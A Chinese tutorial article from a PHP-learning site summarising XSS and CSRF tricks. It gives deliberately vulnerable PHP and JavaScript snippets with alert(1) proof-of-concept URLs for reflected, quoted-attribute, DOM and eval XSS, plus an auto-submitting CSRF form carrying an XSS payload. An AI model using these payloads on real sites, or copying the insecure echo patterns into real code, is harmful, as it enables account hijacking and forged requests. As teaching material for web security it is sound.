网站地图    收藏   

主页 > 后端 > 网站安全 >

xss与csrf自我技巧总结 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 10:16 作者: 阅读:

[导读] xss篇:1,普通的反射型xss?php echo $_GET[ 39;XSS 39;];?POC:http: www test org test php?xss=scriptalert(1) script2,xss反射?phpecho $_GET;?POC:http: www test org test php?scriptaler...

 \

     xss篇:

1,普通的反射型xss

<?php echo $_GET['XSS'];?>

POC:http://www.test.org/test.php?xss=<script>alert(1)</script>

2,xss反射

<?php
echo $_GET;
?>

POC:http://www.test.org/test.php?<script>alert(1)</script>

3,被引号包围的xss

<?php echo "<a href='$_GET['XSS']'>A</A>";?>

POC 1:http://www.test.org/test.php?xss="/><script>alert(1)</script><"

POC 2:http://www.test.org/test.php?xss=javascript:alert(1);

4,在某种情况下过滤了<>但是没有过滤引号

<?php echo "<img src="'$_GET['XSS']'"/>";?>

POC:http://www.test.org/test.php?xss=#"onerror=alert(11);//

5,dom反射

<script>document.write(location.href);</script>

poc:http://www.test.org/test.php#<img/src=# onerror=alert(1)>

火狐等浏览器无效
6,富文本绕过:<base>

<base> 标签为页面上的所有链接规定默认地址或默认目标。

如:<base href="http://www.test.org">

<a href="xss">x</a>href里的URL是http://www.test.org/xss

7,eval

<script>var url = window.location.href;

eval(url)</script>

poc:http://www.test.org/test.php#alert(String.fromCharCode(88, 83, 83))

 

从安全的角度讲所有的输出输入的都是有害的,javascript从的输出有:

document.write()

innerHTML=""

eval()

 

csrf篇

post伪造包提交poc:

<form action="http://www.test.com/test.shtml
" method="POST" name="csrf">

    <input type="text"  name="mobile" value="18265464645<img/src=# onerror=alert(1)>">
    
        <input type="text"  name="currTime" value="1380530205097">
       <input type="text"  name="city" value="">
       <input type="text"  name="isMini" value="5">

</form>
<script>  document.csrf.submit()</script>

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论